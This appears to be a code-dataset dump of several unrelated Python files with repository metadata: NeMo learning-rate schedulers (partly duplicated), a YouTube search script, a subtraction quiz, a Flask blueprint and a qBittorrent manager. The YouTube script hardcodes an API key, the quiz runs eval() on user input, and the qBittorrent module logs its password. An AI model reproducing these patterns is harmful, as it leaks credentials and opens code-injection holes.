iters_per_batch: null # computed at runtime; mandatory to have
max_steps: null # computed at runtime or explicitly set here; mandatory to have
# pytorch lightning args <mandatory>
monitor: val_loss
reduce_on_plateau: false
# <scheduler config override>
args:
name: auto # special keyword, resolves to correct optimizer config for given optimizer name
# cls: nemo.core.config.schedulers.CosineAnnealingParams # explicit instantiation by class path
params: # optional override parameters for the optimizer config
warmup_steps: null
warmup_ratio: null
min_lr: 0.0
last_epoch: -1
Args:
optimizer: An instantiated Optimizer.
scheduler_config: A dictionary / config dict which follows the above schema.
train_dataloader: Optional requirement, must be passed if "iters_per_batch" is defined
instead of "max_steps". Used to compute effective "max_steps".
Returns:
A dictionary containing the LR Scheduler implementation if the config was successfully parsed
along with other parameters required by Pytorch Lightning, otherwise None.
"""
# Build nested dictionary for convenience out of structured objects
if isinstance(scheduler_config, DictConfig):
scheduler_config = OmegaConf.to_container(scheduler_config, resolve=True)
elif dataclasses.is_dataclass(scheduler_config):
# Recursively transform data classes to basic dictionaries
scheduler_config = OmegaConf.create(scheduler_config)
scheduler_config = OmegaConf.to_container(scheduler_config, resolve=True)
# Test to see if config follows above schema
if scheduler_config is not None:
if 'args' in scheduler_config:
scheduler_args = scheduler_config.pop('args')
else:
scheduler_args = copy.deepcopy(scheduler_config)
# Remove extra parameters from scheduler_args nest
# Assume all other parameters are to be passed into scheduler constructor
scheduler_args.pop('name', None)
scheduler_args.pop('iters_per_batch', None)
scheduler_args.pop('monitor', None)
scheduler_args.pop('reduce_on_plateau', None)
else:
# Return gracefully in case `sched` was not supplied; inform user
logging.info('Scheduler not initialized as no `sched` config supplied to setup_optimizer()')
return None
# Try instantiation of scheduler params from config class path
try:
scheduler_args_cfg = OmegaConf.create(scheduler_args)
scheduler_conf = hydra.utils.instantiate(scheduler_args_cfg)
scheduler_args = vars(scheduler_conf)
# Get name of the scheduler
scheduler_name = scheduler_conf.__class__.__name__
if 'Params' in scheduler_name:
scheduler_name = scheduler_name.replace('Params', '')
except Exception:
# Class path instantiation failed; try resolving "name" component
# Get name of the scheduler
if 'name' in scheduler_config:
scheduler_name = scheduler_config['name']
else:
logging.warning(
"Could not resolve classpath for Scheduler Config, and `name` "
"was not provided either. \n"
"Scheduler cannot be instantiated !"
)
return None
# If class path was not provided, perhaps `name` is provided for resolution
if 'name' in scheduler_args:
# If `auto` is passed as name for resolution of optimizer name,
# then lookup optimizer name and resolve its parameter config
if scheduler_args['name'] == 'auto':
scheduler_params_name = "{}Params".format(scheduler_name)
else:
scheduler_params_name = scheduler_args['name']
# Get override arguments provided in the config yaml file / Dict Config
scheduler_params_override = scheduler_args.get('params', {})
# If params is itself a dict config object provided explicitly in Dict Config
# Resolve to dictionary for convenience
if isinstance(scheduler_params_override, DictConfig):
scheduler_params_override = OmegaConf.to_container(scheduler_params_override, resolve=True)
# Get and instantiate the Config dataclass for this scheduler
scheduler_params_cls = get_scheduler_config(scheduler_params_name, **scheduler_params_override)
scheduler_params = scheduler_params_cls() # instantiate the parameters object
scheduler_args = vars(scheduler_params) # extract just the dictionary from the Config object
else:
# assume the input dictionary is schedular args (from dataclasses / omegaconf)
pass
# Extract value to monitor in losses, if provided.
if 'monitor' in scheduler_config:
monitor = scheduler_config.get('monitor')
else:
# Default to train loss
monitor = 'loss'
# Store exact max_steps if it is provided
if 'max_steps' in scheduler_config and scheduler_config['max_steps'] is not None:
max_steps = scheduler_config['max_steps']
elif 'iters_per_batch' in scheduler_config:
# Compute effective max_steps if iters_per_batch is provided
if train_dataloader is None:
logging.warning(
'As `iters_per_batch` is provided/computed, it is required to pass the train dataloader in order\n'
'to compute effective maximum number of steps.\n'
'Scheduler will not be instantiated !'
)
return None
# Raise exception if neither `max_steps` nor `iters_per_batch` is provided
if scheduler_config.get('iters_per_batch', None) is None:
logging.warning(
"`iters_per_batch` cannot be None when `max_steps` is not not provided.\n"
"This can occur when `train dataloader` is not available to correctly "
"prepare the scheduler.\n"
"Scheduler will not be instantiated !"
)
return None
# Get iters_per_batch
iters_per_batch = scheduler_config.get('iters_per_batch')
# Compute effective num max_steps
num_samples = len(train_dataloader.dataset)
batch_size = train_dataloader.batch_size
max_steps = round(num_samples * iters_per_batch / float(batch_size))
else:
logging.warning(
"Neither `max_steps` nor `iters_per_batch` were provided to `optim.sched`, "
"cannot compute effective `max_steps` !\n"
"Scheduler will not be instantiated !"
)
return None
# Inject max_steps (effective or provided) into the scheduler config
scheduler_args['max_steps'] = max_steps
# Get the scheduler class from the config
scheduler_cls = get_scheduler(scheduler_name, **scheduler_args)
# Instantiate the LR schedule
schedule = scheduler_cls(optimizer, **scheduler_args)
logging.info(
'Scheduler "%s" \nwill be used during training (effective maximum steps = %d) - \nParameters : \n(%s)',
str(schedule),
max_steps,
OmegaConf.to_yaml(OmegaConf.create(scheduler_args)),
)
# Wrap the schedule in PTL arguments to perform stepwise computation
# Rather than epoch level computation
if isinstance(schedule, optim.lr_scheduler.ReduceLROnPlateau):
reduce_lr_on_plateau = True
else:
reduce_lr_on_plateau = False
schedule_dict = {
'scheduler': schedule,
'interval': 'step',
'frequency': 1,
'monitor': monitor,
'reduce_on_plateau': reduce_lr_on_plateau,
}
return schedule_dict
AVAILABLE_SCHEDULERS = {
'WarmupPolicy': WarmupPolicy,
'WarmupHoldPolicy': WarmupHoldPolicy,
'SquareAnnealing': SquareAnnealing,
'CosineAnnealing': CosineAnnealing,
'WarmupAnnealing': WarmupAnnealing,
'InverseSquareRootAnnealing': InverseSquareRootAnnealing,
'SquareRootAnnealing': SquareRootAnnealing,
'PolynomialDecayAnnealing': PolynomialDecayAnnealing,
'PolynomialHoldDecayAnnealing': PolynomialHoldDecayAnnealing,
'StepLR': pt_scheduler.StepLR,
'ExponentialLR': pt_scheduler.ExponentialLR,
'ReduceLROnPlateau': pt_scheduler.ReduceLROnPlateau,
'CyclicLR': pt_scheduler.CyclicLR,
}
| 37.839655 | 119 | 0.659179 |
import copy
import dataclasses
import math
import warnings
from functools import partial
from typing import Any, Dict, Optional, Union
import hydra
import torch.optim as optim
import torch.optim.lr_scheduler as pt_scheduler
import torch.utils.data.dataloader as dataloader
from omegaconf import DictConfig, OmegaConf
from torch.optim.lr_scheduler import _LRScheduler
from nemo.core.config import SchedulerParams, get_scheduler_config, register_scheduler_params
from nemo.utils import logging
class WarmupPolicy(_LRScheduler):
def __init__(self, optimizer, *, warmup_steps=None, warmup_ratio=None, max_steps=None, min_lr=0.0, last_epoch=-1):
assert not (
warmup_steps is not None and warmup_ratio is not None
), "Either use particular number of step or ratio"
assert warmup_ratio is None or max_steps is not None, "If there is a ratio, there should be a total steps"
self.max_steps = max_steps
if warmup_steps is not None:
self.warmup_steps = warmup_steps
elif warmup_ratio is not None:
self.warmup_steps = int(warmup_ratio * max_steps)
else:
self.warmup_steps = 0
self.min_lr = min_lr
super().__init__(optimizer, last_epoch)
def get_lr(self):
if not self._get_lr_called_within_step:
warnings.warn(
"To get the last learning rate computed by the scheduler, " "please use `get_last_lr()`.", UserWarning
)
step = self.last_epoch
if step <= self.warmup_steps:
lr_val = (step + 1) / (self.warmup_steps + 1)
return [initial_lr * lr_val for initial_lr in self.base_lrs]
if step > self.max_steps:
return [self.min_lr for _ in self.base_lrs]
return self._get_lr(step)
def _get_lr(self, step):
return self.base_lrs
class WarmupHoldPolicy(WarmupPolicy):
def __init__(
self,
optimizer,
*,
warmup_steps=None,
warmup_ratio=None,
hold_steps=None,
hold_ratio=None,
max_steps=None,
min_lr=0.0,
last_epoch=-1,
):
assert not (hold_steps is not None and hold_ratio is not None), "Either use particular number of step or ratio"
assert hold_ratio is None or max_steps is not None, "If there is a ratio, there should be a total steps"
self.min_lr = min_lr
self._last_warmup_lr = 0.0
self.max_steps = max_steps
if warmup_steps is not None:
self.warmup_steps = warmup_steps
elif warmup_ratio is not None:
self.warmup_steps = int(warmup_ratio * max_steps)
else:
self.warmup_steps = 0
if hold_steps is not None:
self.hold_steps = hold_steps + self.warmup_steps
elif hold_ratio is not None:
self.hold_steps = int(hold_ratio * max_steps) + self.warmup_steps
else:
self.hold_steps = 0
super().__init__(
optimizer,
warmup_steps=warmup_steps,
warmup_ratio=warmup_ratio,
max_steps=max_steps,
last_epoch=last_epoch,
min_lr=min_lr,
)
def get_lr(self):
if not self._get_lr_called_within_step:
warnings.warn(
"To get the last learning rate computed by the scheduler, " "please use `get_last_lr()`.", UserWarning
)
step = self.last_epoch
if step <= self.warmup_steps:
lr_val = (step + 1) / (self.warmup_steps + 1)
return [initial_lr * lr_val for initial_lr in self.base_lrs]
if (step >= self.warmup_steps) and (step < self.hold_steps):
return self.base_lrs
if step > self.max_steps:
return [self.min_lr for _ in self.base_lrs]
return self._get_lr(step)
def _squareroot_annealing(initial_lr, step, max_steps, min_lr):
mult = ((max_steps - step) / max_steps) ** 0.5
out_lr = initial_lr * mult
out_lr = max(out_lr, min_lr)
return out_lr
def _square_annealing(initial_lr, step, max_steps, min_lr):
mult = ((max_steps - step) / max_steps) ** 2
out_lr = initial_lr * mult
out_lr = max(out_lr, min_lr)
return out_lr
def _cosine_annealing(initial_lr, step, max_steps, min_lr):
mult = 0.5 * (1 + math.cos(math.pi * step / max_steps))
out_lr = (initial_lr - min_lr) * mult + min_lr
return out_lr
def _poly_decay(initial_lr, step, decay_steps, power, min_lr, cycle):
if cycle:
multiplier = 1.0 if step == 0 else math.ceil(step / decay_steps)
decay_steps *= multiplier
else:
step = min(step, decay_steps)
p = step / decay_steps
lr = (initial_lr - min_lr) * math.pow(1.0 - p, power)
lr += min_lr
return lr
class SquareAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, min_lr=1e-5, last_epoch=-1, **kwargs):
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
new_lrs = [
_square_annealing(
initial_lr=initial_lr,
step=step - self.warmup_steps,
max_steps=self.max_steps - self.warmup_steps,
min_lr=self.min_lr,
)
for initial_lr in self.base_lrs
]
return new_lrs
class SquareRootAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, min_lr=0, last_epoch=-1, **kwargs):
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
new_lrs = [
_squareroot_annealing(initial_lr=initial_lr, step=step, max_steps=self.max_steps, min_lr=self.min_lr,)
for initial_lr in self.base_lrs
]
return new_lrs
class CosineAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, min_lr=0, last_epoch=-1, **kwargs):
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
for initial_lr in self.base_lrs:
if initial_lr < self.min_lr:
raise ValueError(
f"{self} received an initial learning rate that " f"was lower than the minimum learning rate."
)
new_lrs = [
_cosine_annealing(
initial_lr=initial_lr,
step=step - self.warmup_steps,
max_steps=self.max_steps - self.warmup_steps,
min_lr=self.min_lr,
)
for initial_lr in self.base_lrs
]
return new_lrs
class WarmupAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, last_epoch=-1, min_lr=0.0, **kwargs):
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
progress = float(step / self.max_steps)
warmup_ratio = float(self.warmup_steps / self.max_steps)
mult = max((progress - 1.0) / (warmup_ratio - 1.0), 0.0)
out_lr = [initial_lr * mult for initial_lr in self.base_lrs]
return out_lr
class InverseSquareRootAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, last_epoch=-1, min_lr=0.0, **kwargs):
super().__init__(optimizer=optimizer, max_steps=max_steps, **kwargs, last_epoch=last_epoch, min_lr=min_lr)
def _get_lr(self, step):
denom = ((step + 1) / (self.warmup_steps + 1)) ** 0.5
out_lr = [initial_lr / denom for initial_lr in self.base_lrs]
return out_lr
class PolynomialDecayAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, min_lr=0.0, power=1.0, cycle=False, last_epoch=-1, **kwargs):
self.power = power
self.cycle = cycle
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
new_lrs = [
_poly_decay(
initial_lr,
step=step - self.warmup_steps,
decay_steps=self.max_steps - self.warmup_steps,
power=self.power,
min_lr=self.min_lr,
cycle=self.cycle,
)
for initial_lr in self.base_lrs
]
return new_lrs
class PolynomialHoldDecayAnnealing(WarmupHoldPolicy):
def __init__(self, optimizer, *, max_steps, min_lr=0.0, power=1.0, cycle=False, last_epoch=-1, **kwargs):
self.power = power
self.cycle = cycle
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
new_lrs = [
_poly_decay(
initial_lr,
step=step - self.hold_steps,
decay_steps=self.max_steps - max(self.warmup_steps, self.hold_steps),
power=self.power,
min_lr=self.min_lr,
cycle=self.cycle,
)
for initial_lr in self.base_lrs
]
return new_lrs
def register_scheduler(name: str, scheduler: _LRScheduler, scheduler_params: SchedulerParams):
if name in AVAILABLE_SCHEDULERS:
raise ValueError(f"Cannot override pre-existing schedulers. Conflicting scheduler name = {name}")
AVAILABLE_SCHEDULERS[name] = scheduler
sched_name = "{}_params".format(scheduler.__name__)
register_scheduler_params(name=sched_name, scheduler_params=scheduler_params)
def get_scheduler(name: str, **kwargs: Optional[Dict[str, Any]]) -> _LRScheduler:
if name not in AVAILABLE_SCHEDULERS:
raise ValueError(
f"Cannot resolve scheduler{name}'. Available optimizers are : " f"{AVAILABLE_SCHEDULERS.keys()}"
)
scheduler_cls = AVAILABLE_SCHEDULERS[name]
scheduler = partial(scheduler_cls, **kwargs)
return scheduler
def prepare_lr_scheduler(
optimizer: optim.Optimizer,
scheduler_config: Union[Dict[str, Any], DictConfig],
train_dataloader: Optional[dataloader.DataLoader] = None,
) -> Optional[Dict[str, Any]]:
# Build nested dictionary for convenience out of structured objects
if isinstance(scheduler_config, DictConfig):
scheduler_config = OmegaConf.to_container(scheduler_config, resolve=True)
elif dataclasses.is_dataclass(scheduler_config):
# Recursively transform data classes to basic dictionaries
scheduler_config = OmegaConf.create(scheduler_config)
scheduler_config = OmegaConf.to_container(scheduler_config, resolve=True)
# Test to see if config follows above schema
if scheduler_config is not None:
if 'args' in scheduler_config:
scheduler_args = scheduler_config.pop('args')
else:
scheduler_args = copy.deepcopy(scheduler_config)
# Remove extra parameters from scheduler_args nest
# Assume all other parameters are to be passed into scheduler constructor
scheduler_args.pop('name', None)
scheduler_args.pop('iters_per_batch', None)
scheduler_args.pop('monitor', None)
scheduler_args.pop('reduce_on_plateau', None)
else:
# Return gracefully in case `sched` was not supplied; inform user
logging.info('Scheduler not initialized as no `sched` config supplied to setup_optimizer()')
return None
# Try instantiation of scheduler params from config class path
try:
scheduler_args_cfg = OmegaConf.create(scheduler_args)
scheduler_conf = hydra.utils.instantiate(scheduler_args_cfg)
scheduler_args = vars(scheduler_conf)
# Get name of the scheduler
scheduler_name = scheduler_conf.__class__.__name__
if 'Params' in scheduler_name:
scheduler_name = scheduler_name.replace('Params', '')
except Exception:
# Class path instantiation failed; try resolving "name" component
# Get name of the scheduler
if 'name' in scheduler_config:
scheduler_name = scheduler_config['name']
else:
logging.warning(
"Could not resolve classpath for Scheduler Config, and `name` "
"was not provided either. \n"
"Scheduler cannot be instantiated !"
)
return None
# If class path was not provided, perhaps `name` is provided for resolution
if 'name' in scheduler_args:
# If `auto` is passed as name for resolution of optimizer name,
# then lookup optimizer name and resolve its parameter config
if scheduler_args['name'] == 'auto':
scheduler_params_name = "{}Params".format(scheduler_name)
else:
scheduler_params_name = scheduler_args['name']
# Get override arguments provided in the config yaml file / Dict Config
scheduler_params_override = scheduler_args.get('params', {})
# If params is itself a dict config object provided explicitly in Dict Config
# Resolve to dictionary for convenience
if isinstance(scheduler_params_override, DictConfig):
scheduler_params_override = OmegaConf.to_container(scheduler_params_override, resolve=True)
# Get and instantiate the Config dataclass for this scheduler
scheduler_params_cls = get_scheduler_config(scheduler_params_name, **scheduler_params_override)
scheduler_params = scheduler_params_cls() # instantiate the parameters object
scheduler_args = vars(scheduler_params) # extract just the dictionary from the Config object
else:
# assume the input dictionary is schedular args (from dataclasses / omegaconf)
pass
# Extract value to monitor in losses, if provided.
if 'monitor' in scheduler_config:
monitor = scheduler_config.get('monitor')
else:
# Default to train loss
monitor = 'loss'
# Store exact max_steps if it is provided
if 'max_steps' in scheduler_config and scheduler_config['max_steps'] is not None:
max_steps = scheduler_config['max_steps']
elif 'iters_per_batch' in scheduler_config:
# Compute effective max_steps if iters_per_batch is provided
if train_dataloader is None:
logging.warning(
'As `iters_per_batch` is provided/computed, it is required to pass the train dataloader in order\n'
'to compute effective maximum number of steps.\n'
'Scheduler will not be instantiated !'
)
return None
# Raise exception if neither `max_steps` nor `iters_per_batch` is provided
if scheduler_config.get('iters_per_batch', None) is None:
logging.warning(
"`iters_per_batch` cannot be None when `max_steps` is not not provided.\n"
"This can occur when `train dataloader` is not available to correctly "
"prepare the scheduler.\n"
"Scheduler will not be instantiated !"
)
return None
# Get iters_per_batch
iters_per_batch = scheduler_config.get('iters_per_batch')
# Compute effective num max_steps
num_samples = len(train_dataloader.dataset)
batch_size = train_dataloader.batch_size
max_steps = round(num_samples * iters_per_batch / float(batch_size))
else:
logging.warning(
"Neither `max_steps` nor `iters_per_batch` were provided to `optim.sched`, "
"cannot compute effective `max_steps` !\n"
"Scheduler will not be instantiated !"
)
return None
# Inject max_steps (effective or provided) into the scheduler config
scheduler_args['max_steps'] = max_steps
# Get the scheduler class from the config
scheduler_cls = get_scheduler(scheduler_name, **scheduler_args)
# Instantiate the LR schedule
schedule = scheduler_cls(optimizer, **scheduler_args)
logging.info(
'Scheduler "%s" \nwill be used during training (effective maximum steps = %d) - \nParameters : \n(%s)',
str(schedule),
max_steps,
OmegaConf.to_yaml(OmegaConf.create(scheduler_args)),
)
# Wrap the schedule in PTL arguments to perform stepwise computation
# Rather than epoch level computation
if isinstance(schedule, optim.lr_scheduler.ReduceLROnPlateau):
reduce_lr_on_plateau = True
else:
reduce_lr_on_plateau = False
schedule_dict = {
'scheduler': schedule,
'interval': 'step',
'frequency': 1,
'monitor': monitor,
'reduce_on_plateau': reduce_lr_on_plateau,
}
return schedule_dict
AVAILABLE_SCHEDULERS = {
'WarmupPolicy': WarmupPolicy,
'WarmupHoldPolicy': WarmupHoldPolicy,
'SquareAnnealing': SquareAnnealing,
'CosineAnnealing': CosineAnnealing,
'WarmupAnnealing': WarmupAnnealing,
'InverseSquareRootAnnealing': InverseSquareRootAnnealing,
'SquareRootAnnealing': SquareRootAnnealing,
'PolynomialDecayAnnealing': PolynomialDecayAnnealing,
'PolynomialHoldDecayAnnealing': PolynomialHoldDecayAnnealing,
'StepLR': pt_scheduler.StepLR,
'ExponentialLR': pt_scheduler.ExponentialLR,
'ReduceLROnPlateau': pt_scheduler.ReduceLROnPlateau,
'CyclicLR': pt_scheduler.CyclicLR,
}
| true | true |
f7236ac434b8832bd43e170de2b4dd505d787f85 | 2,154 | py | Python | moodevalyoutube.py | antverdovsky/Upside-Down | 9fd8bb4b1b74f855cb2e7523eecb8bdc58f3e614 | [
"MIT"
] | null | null | null | moodevalyoutube.py | antverdovsky/Upside-Down | 9fd8bb4b1b74f855cb2e7523eecb8bdc58f3e614 | [
"MIT"
] | null | null | null | moodevalyoutube.py | antverdovsky/Upside-Down | 9fd8bb4b1b74f855cb2e7523eecb8bdc58f3e614 | [
"MIT"
] | null | null | null | #!/usr/bin/python
"""
This code executes a search request for the specified search mood.
It takes in a Youtube API key provided by the developer
It randomizes the top results and returns a random URL based on what mood was
called
"""
import argparse
import logging
import json
import random
from pprint import pprint
#Importing all the required libraries
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
#Makes the youtube request annd parses it
DEVELOPER_KEY = 'AIzaSyCEGv-JQcjMIdpXYO9eIhAGWKLJn1XzXos' #Key
YOUTUBE_API_SERVICE_NAME = 'youtube' #API keys
YOUTUBE_API_VERSION = 'v3' #API version
def mood_eval_youtube(keyword, limit):
"""
This function finds the videos which correlate with the specified mood
and returns the list of the URLs of the videos.
Args:
keyword(str): The mood
limit (int): The number to be returned.
Returns:
A list of URL code.
"""
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey = DEVELOPER_KEY)
# Call the search.list method to retrieve results matching the specified
# query term.
# Calls the search response to search for the list from Youtube
search_response = youtube.search().list(q=keyword, part='id,snippet',
maxResults=limit)
search_response = search_response.execute()
# Create an empty list of videos
videos = []
# Add each result to the appropriate list, and then display the lists of
# matching videos.
for search_result in search_response.get('items', []):
if search_result['id']['kind'] == 'youtube#video':
video_id = search_result['id']['videoId']
video_url = "https://www.youtube.com/watch?v={0}".format(video_id)
videos.append(video_url)
return videos
if __name__ == '__main__':
try:
print(mood_eval_youtube("happy", 50))
except HttpError as e:
print ('An HTTP error %d occurred:\n%s' % (e.resp.status, e.content))
| 31.676471 | 78 | 0.662024 |
import argparse
import logging
import json
import random
from pprint import pprint
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
DEVELOPER_KEY = 'AIzaSyCEGv-JQcjMIdpXYO9eIhAGWKLJn1XzXos'
YOUTUBE_API_SERVICE_NAME = 'youtube'
YOUTUBE_API_VERSION = 'v3'
def mood_eval_youtube(keyword, limit):
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey = DEVELOPER_KEY)
search_response = youtube.search().list(q=keyword, part='id,snippet',
maxResults=limit)
search_response = search_response.execute()
videos = []
for search_result in search_response.get('items', []):
if search_result['id']['kind'] == 'youtube#video':
video_id = search_result['id']['videoId']
video_url = "https://www.youtube.com/watch?v={0}".format(video_id)
videos.append(video_url)
return videos
if __name__ == '__main__':
try:
print(mood_eval_youtube("happy", 50))
except HttpError as e:
print ('An HTTP error %d occurred:\n%s' % (e.resp.status, e.content))
| true | true |
f7236bf981d8e58994d8ce22e596355b1031db97 | 619 | py | Python | examples/SubtractionQuiz.py | Ellis0817/Introduction-to-Programming-Using-Python | 1882a2a846162d5ff56d4d56c3940b638ef408bd | [
"MIT"
] | null | null | null | examples/SubtractionQuiz.py | Ellis0817/Introduction-to-Programming-Using-Python | 1882a2a846162d5ff56d4d56c3940b638ef408bd | [
"MIT"
] | 4 | 2019-11-07T12:32:19.000Z | 2020-07-19T14:04:44.000Z | examples/SubtractionQuiz.py | Ellis0817/Introduction-to-Programming-Using-Python | 1882a2a846162d5ff56d4d56c3940b638ef408bd | [
"MIT"
] | 5 | 2019-12-04T15:56:55.000Z | 2022-01-14T06:19:18.000Z | import random
# 1. Generate two random single-digit integers
number1 = random.randint(0, 9)
number2 = random.randint(0, 9)
# 2. If number1 < number2, swap number1 with number2
if number1 < number2:
number1, number2 = number2, number1 # Simultaneous assignment
# 4. Prompt the student to answer "what is number1 - number2?"
answer = eval(input("What is " + str(number1) + " - " +
str(number2) + "? "))
# 4. Grade the answer and display the result
if number1 - number2 == answer:
print("You are correct!")
else:
print("Your answer is wrong.\n", number1, "-",
number2, "is", number1 - number2) | 30.95 | 65 | 0.670436 | import random
number1 = random.randint(0, 9)
number2 = random.randint(0, 9)
if number1 < number2:
number1, number2 = number2, number1
answer = eval(input("What is " + str(number1) + " - " +
str(number2) + "? "))
if number1 - number2 == answer:
print("You are correct!")
else:
print("Your answer is wrong.\n", number1, "-",
number2, "is", number1 - number2) | true | true |
f7236c1d24ebc9967824ee1d78fb2ee142ab6125 | 819 | py | Python | app/main/view.py | fauziwei/_flask_ | a2e8ed2f459df289945fa7942b23e9e02da63bb8 | [
"Apache-2.0"
] | null | null | null | app/main/view.py | fauziwei/_flask_ | a2e8ed2f459df289945fa7942b23e9e02da63bb8 | [
"Apache-2.0"
] | null | null | null | app/main/view.py | fauziwei/_flask_ | a2e8ed2f459df289945fa7942b23e9e02da63bb8 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
'''Fauzi, fauzi@soovii.com'''
from flask import Blueprint, request
from flask_restful import Api, reqparse
from app.view import Resource
from app.model import db
# from app.main.model import Main
from sqlalchemy.exc import SQLAlchemyError
from log import logger
mainBlueprint = Blueprint('main', __name__)
api = Api(mainBlueprint)
parser = reqparse.RequestParser()
parser.add_argument('id', type=int)
class Index(Resource):
# Get something
# curl -i http://localhost:5555/
def get(self):
logger.debug('main is accessed.')
return { 'status': True }
# Create something
def post(self):
args = parser.parse_args()
# Update something
def put(self):
args = parser.parse_args()
# Delete something
def delete(self):
args = parser.parse_args()
api.add_resource(Index, '/', '/main/')
| 20.475 | 43 | 0.726496 |
from flask import Blueprint, request
from flask_restful import Api, reqparse
from app.view import Resource
from app.model import db
from sqlalchemy.exc import SQLAlchemyError
from log import logger
mainBlueprint = Blueprint('main', __name__)
api = Api(mainBlueprint)
parser = reqparse.RequestParser()
parser.add_argument('id', type=int)
class Index(Resource):
def get(self):
logger.debug('main is accessed.')
return { 'status': True }
def post(self):
args = parser.parse_args()
def put(self):
args = parser.parse_args()
def delete(self):
args = parser.parse_args()
api.add_resource(Index, '/', '/main/')
| true | true |
f7236d2aab05f1b600372b63dd82fbd77d8921b1 | 2,531 | py | Python | qBitrr/main.py | Treverr/Qbitrr | 5d781b2180e1070663748e9948c7ba95d5594747 | [
"MIT"
] | null | null | null | qBitrr/main.py | Treverr/Qbitrr | 5d781b2180e1070663748e9948c7ba95d5594747 | [
"MIT"
] | null | null | null | qBitrr/main.py | Treverr/Qbitrr | 5d781b2180e1070663748e9948c7ba95d5594747 | [
"MIT"
] | null | null | null | from typing import NoReturn
import logbook
import qbittorrentapi
import requests
from qbittorrentapi import APINames, login_required, response_text
from .arss import ArrManager
from .config import CONFIG
from .logger import *
logger = logbook.Logger("qBitManager")
# QBitTorrent Config Values
qBit_Host = CONFIG.get("QBit", "Host", fallback="localhost")
qBit_Port = CONFIG.getint("QBit", "Port")
qBit_UserName = CONFIG.get("QBit", "UserName")
qBit_Password = CONFIG.get("QBit", "Password", fallback=None)
logger.debug(
"QBitTorrent Config: Host: {qBit_Host}, Port: {qBit_Port}, Username: {qBit_UserName}, "
"Password: {qBit_Password}",
qBit_Host=qBit_Host,
qBit_Port=qBit_Port,
qBit_UserName=qBit_UserName,
qBit_Password=qBit_Password,
)
class qBitManager:
def __init__(self):
self.client = qbittorrentapi.Client(
host=qBit_Host,
port=qBit_Port,
username=qBit_UserName,
password=qBit_Password,
SIMPLE_RESPONSES=False,
)
self.arr_manager = ArrManager(self).build_arr_instances()
self.logger = logger
self.cache = dict()
self.name_cache = dict()
self.should_delay_torrent_scan = False # If true torrent scan is delayed by 5 minutes.
self.child_processes = []
@response_text(str)
@login_required
def app_version(self, **kwargs):
return self.client._get(
_name=APINames.Application,
_method="version",
_retries=0,
_retry_backoff_factor=0,
**kwargs,
)
@property
def is_alive(self) -> bool:
try:
self.client.app_version()
self.logger.trace(
"Successfully connected to {url}:{port}", url=qBit_Host, port=qBit_Port
)
return True
except requests.RequestException:
self.logger.warning("Could not connect to {url}:{port}", url=qBit_Host, port=qBit_Port)
self.should_delay_torrent_scan = True
return False
def run(self) -> NoReturn:
for arr in self.arr_manager.managed_objects.values():
arr.spawn_child_processes()
for p in self.child_processes:
p.join()
def run():
manager = qBitManager()
try:
manager.run()
finally:
logger.notice("Terminating child processed, please wait a moment.")
for child in manager.child_processes:
child.terminate()
if __name__ == "__main__":
run()
| 28.122222 | 99 | 0.638483 | from typing import NoReturn
import logbook
import qbittorrentapi
import requests
from qbittorrentapi import APINames, login_required, response_text
from .arss import ArrManager
from .config import CONFIG
from .logger import *
logger = logbook.Logger("qBitManager")
qBit_Host = CONFIG.get("QBit", "Host", fallback="localhost")
qBit_Port = CONFIG.getint("QBit", "Port")
qBit_UserName = CONFIG.get("QBit", "UserName")
qBit_Password = CONFIG.get("QBit", "Password", fallback=None)
logger.debug(
"QBitTorrent Config: Host: {qBit_Host}, Port: {qBit_Port}, Username: {qBit_UserName}, "
"Password: {qBit_Password}",
qBit_Host=qBit_Host,
qBit_Port=qBit_Port,
qBit_UserName=qBit_UserName,
qBit_Password=qBit_Password,
)
class qBitManager:
def __init__(self):
self.client = qbittorrentapi.Client(
host=qBit_Host,
port=qBit_Port,
username=qBit_UserName,
password=qBit_Password,
SIMPLE_RESPONSES=False,
)
self.arr_manager = ArrManager(self).build_arr_instances()
self.logger = logger
self.cache = dict()
self.name_cache = dict()
self.should_delay_torrent_scan = False
self.child_processes = []
@response_text(str)
@login_required
def app_version(self, **kwargs):
return self.client._get(
_name=APINames.Application,
_method="version",
_retries=0,
_retry_backoff_factor=0,
**kwargs,
)
@property
def is_alive(self) -> bool:
try:
self.client.app_version()
self.logger.trace(
"Successfully connected to {url}:{port}", url=qBit_Host, port=qBit_Port
)
return True
except requests.RequestException:
self.logger.warning("Could not connect to {url}:{port}", url=qBit_Host, port=qBit_Port)
self.should_delay_torrent_scan = True
return False
def run(self) -> NoReturn:
for arr in self.arr_manager.managed_objects.values():
arr.spawn_child_processes()
for p in self.child_processes:
p.join()
def run():
manager = qBitManager()
try:
manager.run()
finally:
logger.notice("Terminating child processed, please wait a moment.")
for child in manager.child_processes:
child.terminate()
if __name__ == "__main__":
run()
| true | true |
f7236d3fcab67683773e445ba66effeb0a887648 | 7,422 | py | Python | src/client.py | Shandilya21/oratio | 53a77404df35a6b2b73c6a74a0e40d3f8747c408 | [
"BSD-3-Clause"
] | null | null | null | src/client.py | Shandilya21/oratio | 53a77404df35a6b2b73c6a74a0e40d3f8747c408 | [
"BSD-3-Clause"
